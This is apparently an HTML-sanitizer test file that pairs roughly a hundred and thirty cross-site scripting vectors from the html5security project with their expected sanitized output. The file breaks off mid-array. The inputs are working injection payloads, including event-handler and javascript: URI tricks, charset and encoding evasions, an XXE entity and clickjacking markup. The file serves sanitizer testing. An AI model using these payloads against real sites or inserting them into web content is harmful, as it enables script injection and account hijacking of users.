

      1 // vectors by the html5security project (https://code.google.com/p/html5security/ & Creative Commons 3.0 BY), see CC-BY-LICENSE for the full license
      2 
      3 var vectors = [
      4  {
      5    data: '<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>',
      6    sanitized: "<html><head></head><body></body></html>",
      7  },
      8  {
      9    data: '<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi',
     10    sanitized:
     11      "<html><head></head><body>&amp;ADz&amp;AGn&amp;AG0&amp;AEf&amp;ACA&amp;AHM&amp;AHI&amp;AGO&amp;AD0&amp;AGn&amp;ACA&amp;AG8Abg&amp;AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&amp;ACAAPABi</body></html>",
     12  },
     13  {
     14    data: '<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>',
     15    sanitized:
     16      "<html><head></head><body>&amp;alert&amp;A7&amp;(1)&amp;R&amp;UA;&amp;&amp;&lt;&amp;A9&amp;11/script&amp;X&amp;&gt;</body></html>",
     17  },
     18  {
     19    data: "0?<script>Worker(\"#\").onmessage=message=>eval(message.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))",
     20    sanitized:
     21      "<html><head></head><body>0? :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))</body></html>",
     22  },
     23  {
     24    data: "<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>",
     25    sanitized: "<html><head></head><body></body></html>",
     26  },
     27  {
     28    data: "<script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>",
     29    sanitized: "<html><head></head><body></body></html>",
     30  },
     31  {
     32    data: "<input onfocus=write(1) autofocus>",
     33    sanitized: "<html><head></head><body></body></html>",
     34  },
     35  {
     36    data: "<input onblur=write(1) autofocus><input autofocus>",
     37    sanitized: "<html><head></head><body></body></html>",
     38  },
     39  {
     40    data: "<a style=\"-o-link:'javascript:alert(1)';-o-link-source:current\">X</a>",
     41    sanitized: "<html><head></head><body><a>X</a></body></html>",
     42  },
     43  {
     44    data: "<video poster=javascript:alert(1)//></video>",
     45    sanitized:
     46      '<html><head></head><body><video controls="controls"></video></body></html>',
     47  },
     48  {
     49    data: '<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>',
     50    sanitized: "<html><head></head><body></body></html>",
     51  },
     52  {
     53    data: "<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>",
     54    sanitized:
     55      "<html><head></head><body><br><br><br><br><br><br>...<br><br><br><br></body></html>",
     56  },
     57  {
     58    data: '<x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>',
     59    sanitized: "<html><head></head><body>01</body></html>",
     60  },
     61  {
     62    data: "<input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>",
     63    sanitized: "<html><head></head><body></body></html>",
     64  },
     65  {
     66    data: "<script>({0:#0=alert/#0#/#0#(0)})</script>",
     67    sanitized: "<html><head></head><body></body></html>",
     68  },
     69  {
     70    data: "X<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >",
     71    sanitized: "<html><head></head><body>X</body></html>",
     72  },
     73  {
     74    data: '<?xml-stylesheet href="javascript:alert(1)"?><root/>',
     75    sanitized: "<html><head></head><body></body></html>",
     76  },
     77  {
     78    data: '<script xmlns="http://www.w3.org/1999/xhtml">&#x61;l&#x65;rt&#40;1)</script>',
     79    sanitized: "<html><head></head><body></body></html>",
     80  },
     81  {
     82    data: '<meta charset="x-mac-farsi">�script �alert(1)//�/script �',
     83    sanitized:
     84      "<html><head></head><body>�script �alert(1)//�/script �</body></html>",
     85  },
     86  {
     87    data: "<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>",
     88    sanitized: "<html><head></head><body></body></html>",
     89  },
     90  {
     91    data: "<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>",
     92    sanitized: "<html><head></head><body></body></html>",
     93  },
     94  {
     95    data: "<input onblur=focus() autofocus><input>",
     96    sanitized: "<html><head></head><body></body></html>",
     97  },
     98  {
     99    data: "<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>",
    100    sanitized: "<html><head></head><body></body></html>",
    101  },
    102  {
    103    data: "1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=alert(1)&gt;`>",
    104    sanitized: "<html><head></head><body>1</body></html>",
    105  },
    106  {
    107    data: '<script src="#">{alert(1)}</script>;1',
    108    sanitized: "<html><head></head><body>;1</body></html>",
    109  },
    110  {
    111    data: "+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);",
    112    sanitized:
    113      "<html><head></head><body>+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);</body></html>",
    114  },
    115  {
    116    data: "<style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>",
    117    sanitized: "<html><head></head><body></body></html>",
    118  },
    119  {
    120    data: "1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2)  attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=alert(1)&gt;>",
    121    sanitized: "<html><head></head><body>1</body></html>",
    122  },
    123  {
    124    data: "<link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d",
    125    sanitized: "<html><head></head><body></body></html>",
    126  },
    127  {
    128    data: '<style>@import "data:,*%7bx:expression(write(1))%7D";</style>',
    129    sanitized: "<html><head></head><body></body></html>",
    130  },
    131  {
    132    data: "<frameset onload=alert(1)>",
    133    sanitized: "<html><head></head></html>",
    134  },
    135  {
    136    data: '<table background="javascript:alert(1)"></table>',
    137    sanitized: "<html><head></head><body><table></table></body></html>",
    138  },
    139  {
    140    data: '<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(2)">XXX</a>',
    141    sanitized:
    142      "<html><head></head><body><a></a><a>XXX</a><a>XXX</a></body></html>",
    143  },
    144  {
    145    data: "1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>",
    146    sanitized: "<html><head></head><body>1</body></html>",
    147  },
    148  {
    149    data: "1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>",
    150    sanitized: '<html><head></head><body>1<a href="#"></a></body></html>',
    151  },
    152  {
    153    data: '<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>',
    154    sanitized: "<html><head></head><body><a>XXX</a></body></html>",
    155  },
    156  {
    157    data: '<!--<img src="--><img src=x onerror=alert(1)//">',
    158    sanitized: "<html><head></head><body><img></body></html>",
    159  },
    160  {
    161    data: '<comment><img src="</comment><img src=x onerror=alert(1)//">',
    162    sanitized: "<html><head></head><body><img></body></html>",
    163  },
    164  {
    165    data: '<!-- up to Opera 11.52, FF 3.6.28 -->\r\n<![><img src="]><img src=x onerror=alert(1)//">\r\n\r\n<!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+  -->\r\n<svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>',
    166    sanitized:
    167      '<html><head></head><body><img>\n\n\n&gt;&lt;image xlink:href="<img></body></html>',
    168  },
    169  {
    170    data: '<style><img src="</style><img src=x onerror=alert(1)//">',
    171    sanitized: "<html><head></head><body><img></body></html>",
    172  },
    173  {
    174    data: "<li style=list-style:url() onerror=alert(1)></li>\n<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>",
    175    sanitized: "<html><head></head><body><li></li>\n<div></div></body></html>",
    176  },
    177  {
    178    data: '<head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>',
    179    sanitized: "<html><head></head><body><a>XXX</a></body></html>",
    180  },
    181  {
    182    data: '<?xml version="1.0" standalone="no"?>\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<style type="text/css">\r\n@font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";}\r\n</style>\r\n</head>\r\n<body>Hello</body>\r\n</html>',
    183    sanitized: "<html><head>\n\n</head>\n<body>Hello\n</body></html>",
    184  },
    185  {
    186    data: "<style>*[{}@import'test.css?]{color: green;}</style>X",
    187    sanitized: "<html><head></head><body>X</body></html>",
    188  },
    189  {
    190    data: "<div style=\"font-family:'foo[a];color:red;';\">XXX</div>",
    191    sanitized: "<html><head></head><body><div>XXX</div></body></html>",
    192  },
    193  {
    194    data: '<div style="font-family:foo}color=red;">XXX</div>',
    195    sanitized: "<html><head></head><body><div>XXX</div></body></html>",
    196  },
    197  {
    198    data: '<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>',
    199    sanitized: "<html><head></head><body></body></html>",
    200  },
    201  {
    202    data: "<SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>",
    203    sanitized: "<html><head></head><body></body></html>",
    204  },
    205  {
    206    data: '<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>',
    207    sanitized: "<html><head></head><body></body></html>",
    208  },
    209  {
    210    data: '<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>',
    211    sanitized: "<html><head></head><body></body></html>",
    212  },
    213  {
    214    data: '<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>',
    215    sanitized: "<html><head></head><body></body></html>",
    216  },
    217  {
    218    data: '<x style="behavior:url(test.sct)">',
    219    sanitized: "<html><head></head><body></body></html>",
    220  },
    221  {
    222    data: '<xml id="xss" src="test.htc"></xml>\r\n<label dataformatas="html" datasrc="#xss" datafld="payload"></label>',
    223    sanitized: "<html><head></head><body>\n<label></label></body></html>",
    224  },
    225  {
    226    data: "<script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>",
    227    sanitized: "<html><head></head><body></body></html>",
    228  },
    229  {
    230    data: '<video><source onerror="alert(1)">',
    231    sanitized:
    232      '<html><head></head><body><video controls="controls"><source></video></body></html>',
    233  },
    234  {
    235    data: '<video onerror="alert(1)"><source></source></video>',
    236    sanitized:
    237      '<html><head></head><body><video controls="controls"><source></video></body></html>',
    238  },
    239  {
    240    data: "<b <script>alert(1)//</script>0</script></b>",
    241    sanitized: "<html><head></head><body><b>alert(1)//0</b></body></html>",
    242  },
    243  {
    244    data: "<b><script<b></b><alert(1)</script </b></b>",
    245    sanitized: "<html><head></head><body><b></b></body></html>",
    246  },
    247  {
    248    data: '<div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>',
    249    sanitized:
    250      '<html><head></head><body><div id="div1"></div> <div id="div2"></div></body></html>',
    251  },
    252  {
    253    data: '<div style="[a]color[b]:[c]red">XXX</div>',
    254    sanitized: "<html><head></head><body><div>XXX</div></body></html>",
    255  },
    256  {
    257    data: '<div  style="\\63&#9\\06f&#10\\0006c&#12\\00006F&#13\\R:\\000072 Ed;color\\0\\bla:yellow\\0\\bla;col\\0\\00 \\&#xA0or:blue;">XXX</div>',
    258    sanitized: "<html><head></head><body><div>XXX</div></body></html>",
    259  },
    260  {
    261    data: "<!-- IE 6-8 -->\r\n<x '=\"foo\"><x foo='><img src=x onerror=alert(1)//'>\r\n\r\n<!-- IE 6-9 -->\r\n<! '=\"foo\"><x foo='><img src=x onerror=alert(2)//'>\r\n<? '=\"foo\"><x foo='><img src=x onerror=alert(3)//'>",
    262    sanitized: "<html><head></head><body>\n\n\n\n</body></html>",
    263  },
    264  {
    265    data: '<embed src="javascript:alert(1)"></embed> // O10.10�, OM10.0�, GC6�, FF\r\n<img src="javascript:alert(2)">\r\n<image src="javascript:alert(2)"> // IE6, O10.10�, OM10.0�\r\n<script src="javascript:alert(3)"></script> // IE6, O11.01�, OM10.1�',
    266    sanitized:
    267      "<html><head></head><body> // O10.10�, OM10.0�, GC6�, FF\n<img>\n<img> // IE6, O10.10�, OM10.0�\n // IE6, O11.01�, OM10.1�</body></html>",
    268  },
    269  {
    270    data: '<!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y>',
    271    sanitized:
    272      "<!DOCTYPE x[<!entity>\n<html><head></head><body>]&gt;&amp;x;</body></html>",
    273  },
    274  {
    275    data: '<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>',
    276    sanitized: "<html><head></head><body></body></html>",
    277  },
    278  {
    279    data: "<?xml version=\"1.0\"?>\n<?xml-stylesheet type=\"text/xsl\" href=\"data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E\"?>\n<root/>",
    280    sanitized: "<html><head></head><body></body></html>",
    281  },
    282  {
    283    data: '<!DOCTYPE x [\r\n\t<!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x"\r\n onerror CDATA "alert(1)"\r\n onload CDATA "alert(2)">\r\n]><img />',
    284    sanitized:
    285      "<!DOCTYPE x>\n<html><head></head><body>]&gt;<img></body></html>",
    286  },
    287  {
    288    data: '<doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml">\r\n\t<html:style /><x xlink:href="javascript:alert(1)" xlink:type="simple">XXX</x>\r\n</doc>',
    289    sanitized: "<html><head></head><body>\n\tXXX\n</body></html>",
    290  },
    291  {
    292    data: '<card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(1)"/></onevent><timer value="1"/></card>',
    293    sanitized: "<html><head></head><body></body></html>",
    294  },
    295  {
    296    data: "<div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>",
    297    sanitized: "<html><head></head><body><div>x</div></body></html>",
    298  },
    299  {
    300    data: "<// style=x:expression\\28write(1)\\29>",
    301    sanitized: "<html><head></head><body></body></html>",
    302  },
    303  {
    304    data: '<form><button formaction="javascript:alert(1)">X</button>',
    305    sanitized: "<html><head></head><body></body></html>",
    306  },
    307  {
    308    data: '<event-source src="event.php" onload="alert(1)">',
    309    sanitized: "<html><head></head><body></body></html>",
    310  },
    311  {
    312    data: '<a href="javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>',
    313    sanitized: "<html><head></head><body><a></a></body></html>",
    314  },
    315  {
    316    data: "<script<{alert(1)}/></script </>",
    317    sanitized: "<html><head></head><body></body></html>",
    318  },
    319  {
    320    data: '<?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>',
    321    sanitized:
    322      '<!DOCTYPE x SYSTEM "test.dtd">\n<html><head></head><body>&amp;x;</body></html>',
    323  },
    324  {
    325    data: '<?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>',
    326    sanitized: "<html><head></head><body></body></html>",
    327  },
    328  {
    329    data: '<?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>',
    330    sanitized: "<html><head></head><body><img></body></html>",
    331  },
    332  {
    333    data: '<object allowscriptaccess="always" data="test.swf"></object>',
    334    sanitized: "<html><head></head><body></body></html>",
    335  },
    336  {
    337    data: "<style>*{x:EXPRESSION(write(1))}</style>",
    338    sanitized: "<html><head></head><body></body></html>",
    339  },
    340  {
    341    data: '<x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(1)" xlink:type="simple"/>',
    342    sanitized: "<html><head></head><body></body></html>",
    343  },
    344  {
    345    data: '<?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>',
    346    sanitized: "<html><head></head><body></body></html>",
    347  },
    348  {
    349    data: '<x:template xmlns:x="http://www.wapforum.org/2001/wml"  x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)"><x:timer value="1"/></x:template>',
    350    sanitized: "<html><head></head><body></body></html>",
    351  },
    352  {
    353    data: '<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(1)//#x"/>',
    354    sanitized: "<html><head></head><body></body></html>",
    355  },
    356  {
    357    data: '<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>',
    358    sanitized: "<html><head></head><body></body></html>",
    359  },
    360  {
    361    data: "<body oninput=alert(1)><input autofocus>",
    362    sanitized: "<html><head></head><body></body></html>",
    363  },
    364  {
    365    data: '<svg xmlns="http://www.w3.org/2000/svg">\n<a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(1)"><rect width="1000" height="1000" fill="white"/></a>\n</svg>',
    366    sanitized: "<html><head></head><body>\n\n</body></html>",
    367  },
    368  {
    369    data: '<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">\n\n<animation xlink:href="javascript:alert(1)"/>\n<animation xlink:href="data:text/xml,%3Csvg xmlns=\'http://www.w3.org/2000/svg\' onload=\'alert(1)\'%3E%3C/svg%3E"/>\n\n<image xlink:href="data:image/svg+xml,%3Csvg xmlns=\'http://www.w3.org/2000/svg\' onload=\'alert(1)\'%3E%3C/svg%3E"/>\n\n<foreignObject xlink:href="javascript:alert(1)"/>\n<foreignObject xlink:href="data:text/xml,%3Cscript xmlns=\'http://www.w3.org/1999/xhtml\'%3Ealert(1)%3C/script%3E"/>\n\n</svg>',
    370    sanitized: "<html><head></head><body>\n\n\n\n\n\n\n\n\n\n</body></html>",
    371  },
    372  {
    373    data: '<svg xmlns="http://www.w3.org/2000/svg">\n<set attributeName="onmouseover" to="alert(1)"/>\n<animate attributeName="onunload" to="alert(1)"/>\n</svg>',
    374    sanitized: "<html><head></head><body>\n\n\n</body></html>",
    375  },
    376  {
    377    data: '<!-- Up to Opera 10.63 -->\r\n<div style=content:url(test2.svg)></div>\r\n\r\n<!-- Up to Opera 11.64 - see link below -->\r\n\r\n<!-- Up to Opera 12.x -->\r\n<div style="background:url(test5.svg)">PRESS ENTER</div>',
    378    sanitized:
    379      "<html><head></head><body><div></div>\n\n\n\n\n<div>PRESS ENTER</div></body></html>",
    380  },
    381  {
    382    data: '[A]\n<? foo="><script>alert(1)</script>">\n<! foo="><script>alert(1)</script>">\n</ foo="><script>alert(1)</script>">\n[B]\n<? foo="><x foo=\'?><script>alert(1)</script>\'>">\n[C]\n<! foo="[[[x]]"><x foo="]foo><script>alert(1)</script>">\n[D]\n<% foo><x foo="%><script>alert(1)</script>">',
    383    sanitized:
    384      '<html><head></head><body>[A]\n"&gt;\n"&gt;\n"&gt;\n[B]\n"&gt;\n[C]\n\n[D]\n&lt;% foo&gt;</body></html>',
    385  },
    386  {
    387    data: '<div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>',
    388    sanitized: "<html><head></head><body><div>X</div></body></html>",
    389  },
    390  {
    391    data: '<div style="list-style:url(http://foo.f)\\20url(javascript:alert(1));">X</div>',
    392    sanitized: "<html><head></head><body><div>X</div></body></html>",
    393  },
    394  {
    395    data: '<svg xmlns="http://www.w3.org/2000/svg">\n<handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(1)</handler>\n</svg>',
    396    sanitized: "<html><head></head><body>\nalert(1)\n</body></html>",
    397  },
    398  {
    399    data: '<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">\n<feImage>\n<set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64,\nPHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/>\n</feImage>\n</svg>',
    400    sanitized: "<html><head></head><body>\n\n\n\n</body></html>",
    401  },
    402  {
    403    data: "<iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe>\n<iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>",
    404    sanitized: "<html><head></head><body>\n</body></html>",
    405  },
    406  {
    407    data: "<!-- IE 5-9 -->\r\n<div id=d><x xmlns=\"><iframe onload=alert(1)\"></div>\n<script>d.innerHTML+='';</script>\r\n\r\n<!-- IE 10 in IE5-9 Standards mode -->\r\n<div id=d><x xmlns='\"><iframe onload=alert(2)//'></div>\n<script>d.innerHTML+='';</script>",
    408    sanitized:
    409      '<html><head></head><body><div id="d"></div>\n\n\n\n<div id="d"></div>\n</body></html>',
    410  },
    411  {
    412    data: '<div id=d><div style="font-family:\'sans\\27\\2F\\2A\\22\\2A\\2F\\3B color\\3Ared\\3B\'">X</div></div>\n<script>with(document.getElementById("d"))innerHTML=innerHTML</script>',
    413    sanitized:
    414      '<html><head></head><body><div id="d"><div>X</div></div>\n</body></html>',
    415  },
    416  {
    417    data: "XXX<style>\r\n\r\n*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */\r\n\r\n<!--\r\n--><!--*{color:red}   /* all UA */\r\n\r\n*{background:url(xx:x //**/\\red/*)} /* IE 6-7 Standards mode */\r\n\r\n</style>",
    418    sanitized: "<html><head></head><body>XXX</body></html>",
    419  },
    420  {
    421    data: '<img[a][b]src=x[d]onerror[c]=[e]"alert(1)">',
    422    sanitized: "<html><head></head><body></body></html>",
    423  },
    424  {
    425    data: '<a href="[a]java[b]script[c]:alert(1)">XXX</a>',
    426    sanitized: "<html><head></head><body><a>XXX</a></body></html>",
    427  },
    428  {
    429    data: '<img src="x` `<script>alert(1)</script>"` `>',
    430    sanitized: "<html><head></head><body><img></body></html>",
    431  },
    432  {
    433    data: "<script>history.pushState(0,0,'/i/am/somewhere_else');</script>",
    434    sanitized: "<html><head></head><body></body></html>",
    435  },
    436  {
    437    data: '<svg xmlns="http://www.w3.org/2000/svg" id="foo">\r\n<x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/>\r\n</svg>',
    438    sanitized: "<html><head></head><body>\n\n</body></html>",
    439  },
    440  {
    441    data: '<iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>',
    442    sanitized: "<html><head></head><body></body></html>",
    443  },
    444  {
    445    data: '<img src onerror /" \'"= alt=alert(1)//">',
    446    sanitized: "<html><head></head><body><img></body></html>",
    447  },
    448  {
    449    data: "<title onpropertychange=alert(1)></title><title title=></title>",
    450    sanitized:
    451      '<html><head><title></title><title title=""></title></head><body></body></html>',
    452  },
    453  {
    454    data: '<!-- IE 5-8 standards mode -->\r\n<a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(1)></a>">\r\n\r\n<!-- IE 5-9 standards mode -->\r\n<!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//">\r\n<?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//">',
    455    sanitized:
    456      '<html><head></head><body><a href="http://foo.bar/#x=`y"></a><img alt="`&gt;&lt;img src=xx:x onerror=alert(1)&gt;&lt;/a&gt;">\n\n\n<img alt="`&gt;&lt;img src=xx:x onerror=alert(2)//">\n<img alt="`&gt;&lt;img src=xx:x onerror=alert(3)//"></body></html>',
    457  },
    458  {
    459    data: '<svg xmlns="http://www.w3.org/2000/svg">\n<a id="x"><rect fill="white" width="1000" height="1000"/></a>\n<rect  fill="white" style="clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);"/>\n</svg>',
    460    sanitized: "<html><head></head><body>\n\n\n</body></html>",
    461  },
    462  {
    463    data: '<svg xmlns="http://www.w3.org/2000/svg">\r\n<path d="M0,0" style="marker-start:url(test4.svg#a)"/>\r\n</svg>',
    464    sanitized: "<html><head></head><body>\n\n</body></html>",
    465  },
    466  {
    467    data: '<div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>',
    468    sanitized: "<html><head></head><body><div>X</div></body></html>",
    469  },
    470  {
    471    data: '<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>',
    472    sanitized: "<html><head></head><body><div>X</div></body></html>",
    473  },
    474  {
    475    data: '<div id="x">XXX</div>\n<style>\n\n#x{font-family:foo[bar;color:green;}\n\n#y];color:red;{}\n\n</style>',
    476    sanitized: '<html><head></head><body><div id="x">XXX</div>\n</body></html>',
    477  },
    478  {
    479    data: "<x style=\"background:url('x[a];color:red;/*')\">XXX</x>",
    480    sanitized: "<html><head></head><body>XXX</body></html>",
    481  },
    482  {
    483    data: "<!--[if]><script>alert(1)</script -->\r\n<!--[if<img src=x onerror=alert(2)//]> -->",
    484    sanitized: "<html><head></head><body></body></html>",
    485  },
    486  {
    487    data: '<div id="x">x</div>\n<xml:namespace prefix="t">\n<import namespace="t" implementation="#default#time2">\n<t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=alert(1)&gt;">',
    488    sanitized:
    489      '<html><head></head><body><div id="x">x</div>\n\n\n</body></html>',
    490  },
    491  {
    492    data: '<a href="http://attacker.org">\n\t<iframe src="http://example.org/"></iframe>\n</a>',
    493    sanitized:
    494      '<html><head></head><body><a href="http://attacker.org">\n\t\n</a></body></html>',
    495  },
    496  {
    497    data: '<div draggable="true" ondragstart="event.dataTransfer.setData(\'text/plain\',\'malicious code\');">\n\t<h1>Drop me</h1>\n</div>\n\n<iframe src="http://www.example.org/dropHere.html"></iframe>',
    498    sanitized:
    499      '<html><head></head><body><div draggable="true">\n\t<h1>Drop me</h1>\n</div>\n\n</body></html>',
    500  },
    501  {
    502    data: '<iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe>\n\n<textarea type="text" cols="50" rows="10"></textarea>',
    503    sanitized:
    504      '<html><head></head><body>\n\n<textarea type="text" cols="50" rows="10"></textarea></body></html>',
    505  },
    506  {
    507    data: "<script>\nfunction makePopups(){\n\tfor (i=1;i<6;i++) {\n\t\twindow.open('popup.html','spam'+i,'width=50,height=50');\n\t}\n}\n</script>\n\n<body>\n<a href=\"#\" onclick=\"makePopups()\">Spam</a>",
    508    sanitized:
    509      '<html><head>\n\n</head><body>\n<a href="#">Spam</a></body></html>',
    510  },
    511  {
    512    data: '<html xmlns="http://www.w3.org/1999/xhtml"\nxmlns:svg="http://www.w3.org/2000/svg">\n<body style="background:gray">\n<iframe src="http://example.com/" style="width:800px; height:350px; border:none; mask: url(#maskForClickjacking);"/>\n<svg:svg>\n<svg:mask id="maskForClickjacking" maskUnits="objectBoundingBox" maskContentUnits="objectBoundingBox">\n\t<svg:rect x="0.0" y="0.0" width="0.373" height="0.3" fill="white"/>\n\t<svg:circle cx="0.45" cy="0.7" r="0.075" fill="white"/>\n</svg:mask>\n</svg:svg>\n</body>\n</html>',
    513    sanitized:
    514      '<html><head></head><body>\n\n&lt;svg:svg&gt;\n&lt;svg:mask id="maskForClickjacking" maskUnits="objectBoundingBox" maskContentUnits="objectBoundingBox"&gt;\n\t&lt;svg:rect x="0.0" y="0.0" width="0.373" height="0.3" fill="white"/&gt;\n\t&lt;svg:circle cx="0.45" cy="0.7" r="0.075" fill="white"/&gt;\n&lt;/svg:mask&gt;\n&lt;/svg:svg&gt;\n&lt;/body&gt;\n&lt;/html&gt;</body></html>',
    515  },
    516  {
    517    data: '<iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>',
    518    sanitized: "<html><head></head><body></body></html>",
    519  },
    520  {
    521    data: '<span class=foo>Some text</span>\n<a class=bar href="http://www.example.org">www.example.org</a>\n\n<script src="http://code.jquery.com/jquery-1.4.4.js"></script>\n<script>\n$("span.foo").click(function() {\nalert(\'foo\');\n$("a.bar").click();\n});\n$("a.bar").click(function() {\nalert(\'bar\');\nlocation="http://html5sec.org";\n});\n</script>',
    522    sanitized:
    523      '<html><head></head><body><span class="foo">Some text</span>\n<a class="bar" href="http://www.example.org">www.example.org</a>\n\n\n</body></html>',
    524  },
    525  {
